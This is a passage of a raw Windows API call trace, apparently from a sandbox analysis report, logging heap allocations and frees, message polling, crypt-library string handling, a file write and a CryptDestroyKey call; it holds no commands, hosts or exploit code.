dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.168] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0140.168] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0140.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0140.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fa38 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0140.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.170] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0140.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0140.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0140.171] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.171] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.171] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0140.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.172] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0140.172] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0140.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fa38 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34f48 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fa38 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0140.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.176] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f27aa0*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f27aa0*, lpNumberOfBytesWritten=0x8cf5e4*=0x2a80, lpOverlapped=0x0) returned 1 [0140.178] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.178] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.178] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0140.178] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0140.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.178] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0140.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.179] CryptDestroyKey (hKey=0xa87350) returned 1 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0140.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0140.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0140.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.181] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0140.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0140.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.255] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0140.255] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0140.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0140.255] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0140.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 